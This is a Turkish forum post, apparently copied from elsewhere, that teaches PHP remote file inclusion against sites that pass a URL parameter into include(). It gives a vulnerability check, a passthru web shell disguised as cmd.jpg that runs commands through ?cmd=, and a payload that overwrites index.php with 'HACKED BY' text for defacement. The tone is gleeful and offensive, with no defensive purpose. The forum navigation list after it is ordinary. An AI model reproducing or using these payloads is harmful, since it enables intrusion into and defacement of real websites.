PHP enjeksyonunu nasıl yaparız :
ÖRNEK:
http://www.asd.com/index.php?page=downloads.php (index.php olması şart diil ama genellikle bu kullannılıyor)
Şimdi bunu açıklayacak olursak index.php dosyası diyoki sunucuya bana download.php dosyasını ekrana getir diyor. Yani demek oluyor ki index.php emir veriyor bana şunu şunu yap diye. Bizde bu açıktan yararlanarak sunucunun içindekiler ile oynicaz.
Index.php şundan ibaret :
<?php
include("header.inc");
include($page);
?>
bu kadar : )) PHP den alnayanlar zaten bunu gördükten sonra konuyu hemen çakar.
Diyelimki böyle bir site buldunuz. Enjeksyonu yapabilecekmiyiz yapamıcakmıyız önce onu kontrol edelim. ?page= yazan yerin yanına bir web adresi yazalım. Yazdıktan sonra enterladığımızda yazdığımz siteye yönlendiriliyorsak o zaman enjeksyonu gerçekleştirebiliriz.
ÖRNEK:
http://www.asd.com/index.php?page=http://www.yahoo.com yazdığımız zaman eğer kendimizi Yahoo.com da bulduysak o zaman enjeksyonu gerçekleştirebiliriz. YaşAsIINN LeaM : ))
Şimdi biz bu siteye PHP kod enjekte edecez. Nasıl mı : ))
İlk önce aşağıdaki PHP kodunu notpada yapıştırıp cmd.jpg diye kaydedip bir PHP sunucusuna upload edecez. (www.siteburg.com www.5gigs.com )
<?php
passthru($cmd);
?>
Upload ettikten sonra ?page= yazan yerin yanına upload ettiğimiz cmd.jpg dosyasının adresini yazıyoruz ve yanına ?cmd=ls yazıyoruz. Bunu yazdığımızda sunucunun içindeki her şey görünecektir : )) Eğer UNIX ten anlıyorsanız başka komutlar da verebilirsiniz ?cmd=mkdir ASDDSA fln
ÖRNEK:
http://www.asd.com/index.php?page=http: ... jpg?cmd=ls yazdığımızda sunucudaki bütün dosyalar görünecektir. ?cmd= in yanına sunucudaki her hangi bir klasor yazdığımız zaman da o klasore gider.
Şimdide nasıl index atılacağını anlatacağım. Şimdi de bir PHP kod enjekte edeceis : )) Aşağıdaki koddan $text= HACKED BY ASDDSA yazısını kendinize gore değiştirip de notpade kopyalayın : )) ( $text= arasına htlm kodları yazabilriisnz ) sonrada muhaha.jpg yapıp kaydedin : )). Sunucunuza upload edin ve de cmd.jpg de yaptığımız gibi ?page= in yanına yazıyoruz .
<?php
$text=" ";
$file=fopen("index.php","w");
fwrite($file,$text);
fclose($file)
?>
ALINTIDIR
php injection
PC güvenliği konusundaki bilgi paylaşım alanıdır.
- velociraptor
- Yottabyte4

- Mesajlar: 55266
- Kayıt: 14 Mar 2006, 02:33
- cinsiyet: Erkek
- Teşekkür etti: 21773 kez
- Teşekkür edildi: 12661 kez
Geçiş yap
- GENEL
- ↳ Duyuru ve Uyarılar (Foruma üyelik)
- ↳ Forumla ilgili istek ve şikayetler
- ↳ Tanışma ve Kaynaşma
- ↳ Teknoloji ve bilim haberleri
- ↳ Cumhuriyet ve Atatürk
- ↳ Cep telefonları
- ↳ Bayanlar için + Aşk Sevgi ve Magazin
- ↳ Yemek Tatlı ve Pasta
- ↳ Kitap
- ↳ Yemek mekanları tanıtımı
- ↳ Elektrik ve elektronik
- İŞLETİM SİSTEMLERİ
- ↳ Windows 12
- ↳ Windows 11
- ↳ Windows 10
- ↳ Windows 8 ve 8.1
- ↳ Windows 7
- ↳ Windows Vista
- ↳ Windows XP
- ↳ Windows Server Ailesi
- ↳ Linux ve Unix tabanli isletim sistemleri
- ↳ Genel bilgiler ve ipuçları
- ↳ Kendi ürettiğimiz programlar
- SOFTWARE & HARDWARE
- ↳ Yazılım (Freeware)
- ↳ H4NOK Software development
- ↳ Portable Programlar
- ↳ Hardware (Donanım)
- ↳ Ürün şikayetleri
- ↳ Internet ve Network
- ↳ PC güvenlik
- ↳ Chat Programları
- ↳ Microsoft Office
- WEB & PROGRAMLAMA & DİĞER
- ↳ Web design
- ↳ Photoshop
- ↳ Programlama ve Script dilleri
- ↳ Video sitelerinden paylaşımlar
- ↳ Türkçe müzik
- ↳ Yabancı müzik
- ↳ Belgeseller
- ↳ Türk Filimleri
- ↳ Faydalı ve Eğitim
- ↳ Komik ve İlginç
- ↳ Bilişim
- ↳ Freeware Oyunlar
- ↳ Görsel Dosyalar (Resim)
- ↳ Şifalı bitkiler ve Sağlık bilgileri
- ↳ Off topic (konu dışı)
- ↳ Özlü söz - hikaye
- ↳ Gerekli bilgi
- ↳ Tavsiye filimler
